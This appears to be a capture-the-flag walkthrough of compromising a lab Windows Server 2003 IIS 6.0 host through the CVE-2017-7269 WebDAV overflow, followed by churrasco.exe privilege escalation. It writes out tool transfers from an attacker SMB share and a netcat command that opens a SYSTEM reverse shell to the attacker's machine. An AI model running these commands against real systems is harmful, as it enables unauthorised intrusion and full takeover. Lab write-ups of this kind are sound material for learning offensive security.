Essentially the same as Granny.
Prerequisites
nikto, nmap, WebDAV on IIS 6.0
directories writable by a low-privileged Windows user
CVE-2017-7269, churrasco.exe ("Brazilian barbecue")
Information gathering and getting a foothold
Start by scanning for open ports and services:
nmap 10.10.10.14
Only port 80 (HTTP) is open, so open it in a browser first.
It is just an error page, so scan it with nikto:
nikto -h http://10.10.10.14
From the output we can see it is IIS 6.0, WebDAV is enabled (the DAV, DASL and MS-Author-Via headers below), and a MicrosoftOfficeWebServer header is present:
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
This looks just like Granny, so I fired the same CVE-2017-7269 exploit (the IIS 6.0 WebDAV overflow) at it; with some luck the shell came straight back.
The privileges are low, though:
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
Privilege escalation
The machine is Windows Server 2003, so churrasco ("Brazilian barbecue"), used before, is a good candidate: it abuses token kidnapping to run a command as SYSTEM from the NETWORK SERVICE account we already have.
First start an SMB server locally and pull the binaries over from the shell. smbserver.py serves the directory it is run from (pwd below), so churrasco.exe and nc.exe must both be in that directory:
sudo cp /usr/share/sqlninja/apps/churrasco.exe /var/www/html/
sudo smbserver.py share `pwd`
net use \\10.10.14.4\share
copy \\10.10.14.4\share\churrasco.exe
All of that failed, though: copy with no destination writes into the current directory, and c:\windows\system32\inetsrv is not writable for NETWORK SERVICE.
So we need a writable directory. After some searching (an article on finding writable directories on Windows) I ended up in C:\WINDOWS\Temp:
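A quick way to locate a directory NETWORK SERVICE can write to, as an added example that is not part of the original writeup: the script below tries to create and then delete a probe file in each candidate directory and reports which ones succeed. The candidate list is my own assumption (only C:\WINDOWS\Temp is confirmed on this box); add or remove paths as needed. It is written for cmd.exe on Windows Server 2003, which has no PowerShell.

```batch
@echo off
REM Added example, not from the original writeup.
REM Probes candidate directories for write access by creating and deleting a
REM small file. Runs under cmd.exe on Windows Server 2003 as the low-privileged
REM account we landed with (NT AUTHORITY\NETWORK SERVICE).
setlocal
set "PROBE=__wtest_%RANDOM%.tmp"

REM Candidate list is an assumption; only C:\WINDOWS\Temp is confirmed writable here.
for %%D in (
    "C:\WINDOWS\Temp"
    "C:\WINDOWS\Tasks"
    "C:\WINDOWS\system32\spool\PRINTERS"
    "C:\Documents and Settings\All Users\Application Data"
    "C:\Inetpub\wwwroot"
) do (
    REM If the redirect is denied the command fails and the failure branch runs.
    (echo probe>"%%~D\%PROBE%") 2>nul && (
        del /q "%%~D\%PROBE%" 2>nul
        echo [+] writable: %%~D
    ) || (
        echo [-] not writable: %%~D
    )
)
endlocal
```

To avoid needing a writable directory just to drop the .bat file, paste the for loop straight into the reverse shell on one line, replacing each %%D with %D (interactive cmd uses single percent signs). Then cd into a directory it reports as writable before running copy \\10.10.14.4\share\..., since copy without a destination writes to the current directory.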
net use \\10.10.14.4\share
copy \\10.10.14.4\share\churrasco.exe
copy \\10.10.14.4\share\nc.exe
churrasco.exe -d "C:\WINDOWS\Temp\nc.exe -e cmd.exe 10.10.14.4 8888"
Output:
listening on [any] 8888 ...
10.10.10.14: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.14] 1038
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system